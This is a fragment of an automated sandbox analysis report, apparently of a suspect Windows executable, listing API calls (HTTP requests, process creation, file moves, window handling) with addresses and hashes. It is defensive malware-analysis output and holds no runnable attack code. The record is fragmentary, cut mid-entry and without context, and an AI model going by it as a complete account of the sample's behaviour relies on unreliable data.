                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00ADBB85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 1704125052-3381328864
                                                • Opcode ID: 717bbe24be2007fabd653ad05e1c5ab90148560029b2de6b4bb6474bd4458486
                                                • Instruction ID: 18c6335c32e1d6f49b92bfb29bbda5f702470aadfa1e667312bcdbfedd1ea185
                                                • Opcode Fuzzy Hash: 717bbe24be2007fabd653ad05e1c5ab90148560029b2de6b4bb6474bd4458486
                                                • Instruction Fuzzy Hash: 0411067A618307F9FB206730DC07EA637ACDB12324B21006BFD06E51E9EFA5A95145A4
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00AFB2D5
                                                • CoInitialize.OLE32(00000000), ref: 00AFB302
                                                • CoUninitialize.OLE32 ref: 00AFB30C
                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00AFB40C
                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AFB539
                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00AFB56D
                                                • CoGetObject.OLE32(?,00000000,00B2D91C,?), ref: 00AFB590
                                                • SetErrorMode.KERNEL32(00000000), ref: 00AFB5A3
                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AFB623
                                                • VariantClear.OLEAUT32(00B2D91C), ref: 00AFB633
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                • String ID:
                                                • API String ID: 2395222682-0
                                                • Opcode ID: b12bd593a9d1a0638a81daed600241ded74a8f3f403c4843ba6b9c4ea724d52c
                                                • Instruction ID: 1510561dc2418ef761e718be6a6c782b87f2d20651e25e3ba4114ba26ab597c1
                                                • Opcode Fuzzy Hash: b12bd593a9d1a0638a81daed600241ded74a8f3f403c4843ba6b9c4ea724d52c
                                                • Instruction Fuzzy Hash: 62C12271618305AFC700DFA8C98492BB7F9BF89348F00495DF68A9B261DB71ED05CB62
                                                APIs
                                                • __lock.LIBCMT ref: 00ACACC1
                                                  • Part of subcall function 00AC7CF4: __mtinitlocknum.LIBCMT ref: 00AC7D06
                                                  • Part of subcall function 00AC7CF4: EnterCriticalSection.KERNEL32(00000000,?,00AC7ADD,0000000D), ref: 00AC7D1F
                                                • __calloc_crt.LIBCMT ref: 00ACACD2
                                                  • Part of subcall function 00AC6986: __calloc_impl.LIBCMT ref: 00AC6995
                                                  • Part of subcall function 00AC6986: Sleep.KERNEL32(00000000,000003BC,00ABF507,?,0000000E), ref: 00AC69AC
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00ACACED
                                                • GetStartupInfoW.KERNEL32(?,00B56E28,00000064,00AC5E91,00B56C70,00000014), ref: 00ACAD46
                                                • __calloc_crt.LIBCMT ref: 00ACAD91
                                                • GetFileType.KERNEL32(00000001), ref: 00ACADD8
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00ACAE11
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 1426640281-0
                                                • Opcode ID: fd66b3362807b658b738de6a154224fdbb99b07a5848f06750e84036bf1d983d
                                                • Instruction ID: 94eec335edc023205d2e066628189bb082f3198e971fd55ef4edc3d1fc3f1825
                                                • Opcode Fuzzy Hash: fd66b3362807b658b738de6a154224fdbb99b07a5848f06750e84036bf1d983d
                                                • Instruction Fuzzy Hash: 968108719057598FDB24CF68C940BBDBBF0AF29328B25425DD4A6AB3D1CB349803CB95
                                                APIs
                                                • __swprintf.LIBCMT ref: 00AE67FD
                                                • __swprintf.LIBCMT ref: 00AE680A
                                                  • Part of subcall function 00AC172B: __woutput_l.LIBCMT ref: 00AC1784
                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AE6834
                                                • LoadResource.KERNEL32(?,00000000), ref: 00AE6840
                                                • LockResource.KERNEL32(00000000), ref: 00AE684D
                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 00AE686D
                                                • LoadResource.KERNEL32(?,00000000), ref: 00AE687F
                                                • SizeofResource.KERNEL32(?,00000000), ref: 00AE688E
                                                • LockResource.KERNEL32(?), ref: 00AE689A
                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AE68F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                • String ID:
                                                • API String ID: 1433390588-0
                                                • Opcode ID: cbdb1e4faabe161cb0963723159bfce25a73bb4b443d6bb4b626e8874ce22a3d
                                                • Instruction ID: 8cfe6bc9066ae6bb3b9524b7365ab43afc97316f668e9fae81f0ab3d67f5b2d6
                                                • Opcode Fuzzy Hash: cbdb1e4faabe161cb0963723159bfce25a73bb4b443d6bb4b626e8874ce22a3d
                                                • Instruction Fuzzy Hash: BB318E7190025AEBDB119FA2DD59EBE7BA8EF18381F044825F902E3151EB74D912DBA0
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 00ABB496
                                                • SetTextColor.GDI32(?,000000FF), ref: 00ABB4A0
                                                • SetBkMode.GDI32(?,00000001), ref: 00ABB4B5
                                                • GetStockObject.GDI32(00000005), ref: 00ABB4BD
                                                • GetClientRect.USER32(?), ref: 00B1DD63
                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B1DD7A
                                                • GetWindowDC.USER32(?), ref: 00B1DD86
                                                • GetPixel.GDI32(00000000,?,?), ref: 00B1DD95
                                                • ReleaseDC.USER32(?,00000000), ref: 00B1DDA7
                                                • GetSysColor.USER32(00000005), ref: 00B1DDC5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                • String ID:
                                                • API String ID: 3430376129-0
                                                • Opcode ID: 048a1ce3f8d46c47752caad50ef3258ef306cee0403e9d31980087a503f7783c
                                                • Instruction ID: e3125e5ceea722ba0f8d24ce08cfc20b8958dd045a1358e55ff2fb2ee2809645
                                                • Opcode Fuzzy Hash: 048a1ce3f8d46c47752caad50ef3258ef306cee0403e9d31980087a503f7783c
                                                • Instruction Fuzzy Hash: 1E118E31100205EFDB216FA4EC08BE93FB5FB05322F108665FA66A60E2CF714952EF20
                                                APIs
                                                • EnumChildWindows.USER32(?,00ADCF50), ref: 00ADCE90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ChildEnumWindows
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 3555792229-1603158881
                                                • Opcode ID: 07d956990ff62af36b723678851136fe311c96a0ca7f29bed39863ef39726a85
                                                • Instruction ID: fe76f8a702a9554837af4481664034c06a8c394e11e9b5d81d0ca8e07e163836
                                                • Opcode Fuzzy Hash: 07d956990ff62af36b723678851136fe311c96a0ca7f29bed39863ef39726a85
                                                • Instruction Fuzzy Hash: 1A91C571600207ABCB18DF60C581BEAFBB5FF05310F94855AE84BA7291DF306959DBD0
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AA30DC
                                                • CoUninitialize.OLE32(?,00000000), ref: 00AA3181
                                                • UnregisterHotKey.USER32(?), ref: 00AA32A9
                                                • DestroyWindow.USER32(?), ref: 00B15079
                                                • FreeLibrary.KERNEL32(?), ref: 00B150F8
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B15125
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                • Opcode ID: fa980052cf4cd979fcef8a1eb8c10aad2988056c8a958688a3550ff381302c4d
                                                • Instruction ID: 4abc83582046cac83cf6acf6c73a3beb19b6c84ef887f9760d86d769e8159e27
                                                • Opcode Fuzzy Hash: fa980052cf4cd979fcef8a1eb8c10aad2988056c8a958688a3550ff381302c4d
                                                • Instruction Fuzzy Hash: 3E911C31600202DFCB15EF54C995BA8F3A4FF1A305F5482A9F50AA72A2DF31AE56CF50
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 00ABCC15
                                                  • Part of subcall function 00ABCCCD: GetClientRect.USER32(?,?), ref: 00ABCCF6
                                                  • Part of subcall function 00ABCCCD: GetWindowRect.USER32(?,?), ref: 00ABCD37
                                                  • Part of subcall function 00ABCCCD: ScreenToClient.USER32(?,?), ref: 00ABCD5F
                                                • GetDC.USER32 ref: 00B1D137
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B1D14A
                                                • SelectObject.GDI32(00000000,00000000), ref: 00B1D158
                                                • SelectObject.GDI32(00000000,00000000), ref: 00B1D16D
                                                • ReleaseDC.USER32(?,00000000), ref: 00B1D175
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B1D200
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                • Opcode ID: 2ced9bf1de75f420a537960858e3a9629db78b7374089ef273120793726f83ed
                                                • Instruction ID: 9cec284a02ce8bda2453100844df89c87cc6639a2f5462d32a8542b446d0f16e
                                                • Opcode Fuzzy Hash: 2ced9bf1de75f420a537960858e3a9629db78b7374089ef273120793726f83ed
                                                • Instruction Fuzzy Hash: 5671DF31400205EFCF219F64C885EEA7BB5FF59320F6846A9ED55AB2A6CB318C91DF50
                                                APIs
                                                  • Part of subcall function 00ABB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ABB35F
                                                  • Part of subcall function 00ABB63C: GetCursorPos.USER32(000000FF), ref: 00ABB64F
                                                  • Part of subcall function 00ABB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00ABB66C
                                                  • Part of subcall function 00ABB63C: GetAsyncKeyState.USER32(00000001), ref: 00ABB691
                                                  • Part of subcall function 00ABB63C: GetAsyncKeyState.USER32(00000002), ref: 00ABB69F
                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00B0ED3C
                                                • ImageList_EndDrag.COMCTL32 ref: 00B0ED42
                                                • ReleaseCapture.USER32 ref: 00B0ED48
                                                • SetWindowTextW.USER32(?,00000000), ref: 00B0EDF0
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B0EE03
                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00B0EEDC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                • API String ID: 1924731296-2107944366
                                                • Opcode ID: 4129489c713ce23b38569d84979ddb1709451b2ecbbab995659d6ec293a30d54
                                                • Instruction ID: d967349be0043aa7bba6855afe4a230d3e3b42ddcd8b1e867736147498f076eb
                                                • Opcode Fuzzy Hash: 4129489c713ce23b38569d84979ddb1709451b2ecbbab995659d6ec293a30d54
                                                • Instruction Fuzzy Hash: E651BA34204304AFE710DF24CC96FAA7BE8FB88314F04496DF995972E2DBB4A904CB52
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AF45FF
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AF462B
                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00AF466D
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AF4682
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF468F
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00AF46BF
                                                • InternetCloseHandle.WININET(00000000), ref: 00AF4706
                                                  • Part of subcall function 00AF5052: GetLastError.KERNEL32(?,?,00AF43CC,00000000,00000000,00000001), ref: 00AF5067
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                • String ID:
                                                • API String ID: 1241431887-3916222277
                                                • Opcode ID: 7789374082c54c01afaa6a77e3a61b1f86cbba6be1bb012e571859b4bb26fdc5
                                                • Instruction ID: 3440f33e38ce9d4d599c2564541fc713fca727ced57e5dbfe10830189257f4c0
                                                • Opcode Fuzzy Hash: 7789374082c54c01afaa6a77e3a61b1f86cbba6be1bb012e571859b4bb26fdc5
                                                • Instruction Fuzzy Hash: 12417CB1501209BFEB129FA4CC85FBB7BACEF0D314F104126FA05DA151EBB49D459BA4
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B3DC00), ref: 00AFB715
                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B3DC00), ref: 00AFB749
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AFB8C1
                                                • SysFreeString.OLEAUT32(?), ref: 00AFB8EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                • String ID:
                                                • API String ID: 560350794-0
                                                • Opcode ID: 546a4c744de1fa9ff0566a5af64c65b8f46a0d57bc0fe1b36f970369dd56d054
                                                • Instruction ID: 3f30b7cd2e37420de170fd7cbc813fd2d34cf27032ad9ceaf5343ab50566954b
                                                • Opcode Fuzzy Hash: 546a4c744de1fa9ff0566a5af64c65b8f46a0d57bc0fe1b36f970369dd56d054
                                                • Instruction Fuzzy Hash: ABF12A71A10209EFDB14DF94C884EBEB7B9FF89351F108458FA05AB250DB71AE45CBA0
                                                APIs
                                                • _memset.LIBCMT ref: 00B024F5
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B02688
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B026AC
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B026EC
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B0270E
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B0286F
                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B028A1
                                                • CloseHandle.KERNEL32(?), ref: 00B028D0
                                                • CloseHandle.KERNEL32(?), ref: 00B02947
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                • String ID:
                                                • API String ID: 4090791747-0
                                                • Opcode ID: e3b635e1bdcf639a67413a9a83d28bd1b0df909d02d272a1b1a3e59e84b2f5aa
                                                • Instruction ID: 2509a40a28401fe2f5f40ab5eb9c41e70fb24cd28c4c471ea0d7926a3142ea81
                                                • Opcode Fuzzy Hash: e3b635e1bdcf639a67413a9a83d28bd1b0df909d02d272a1b1a3e59e84b2f5aa
                                                • Instruction Fuzzy Hash: 2DD18B35604300DFCB14EF24C995A6ABBE5EF85310F1489ADF8999B2E2DB31DC49CB52
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B0B3F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: bef31c8e0c0f64587b4f24acf57ef18d395c548defb24fc90759a149a41b546f
                                                • Instruction ID: b3b53e6940279cd517fcddadd1eae7ede3dfe57b8a427d2e43e98b6903d0ed21
                                                • Opcode Fuzzy Hash: bef31c8e0c0f64587b4f24acf57ef18d395c548defb24fc90759a149a41b546f
                                                • Instruction Fuzzy Hash: 1F517C31600204BFEF209F28CC95FAD3FE8EB05764F644495F615E62E2CBB1E9808A55
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B1DB1B
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B1DB3C
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B1DB51
                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B1DB6E
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B1DB95
                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00ABA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B1DBA0
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B1DBBD
                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00ABA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B1DBC8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                • String ID:
                                                • API String ID: 1268354404-0
                                                • Opcode ID: cd08f64ca9b41a9c838ba9c41251f915e6d8d4660c1150b59b2f07ee98b68579
                                                • Instruction ID: ff7e8128411af0f286b81f7f526607a75070964c6eb5376e4621feccae2471da
                                                • Opcode Fuzzy Hash: cd08f64ca9b41a9c838ba9c41251f915e6d8d4660c1150b59b2f07ee98b68579
                                                • Instruction Fuzzy Hash: B8514570604209AFDB20DF68CC91FEA77F8EB18754F100528F946972E1DBB4AD80DB50
                                                APIs
                                                  • Part of subcall function 00AE6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE5FA6,?), ref: 00AE6ED8
                                                  • Part of subcall function 00AE6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AE5FA6,?), ref: 00AE6EF1
                                                  • Part of subcall function 00AE72CB: GetFileAttributesW.KERNEL32(?,00AE6019), ref: 00AE72CC
                                                • lstrcmpiW.KERNEL32(?,?), ref: 00AE75CA
                                                • _wcscmp.LIBCMT ref: 00AE75E2
                                                • MoveFileW.KERNEL32(?,?), ref: 00AE75FB
                                                Memory Dump Source
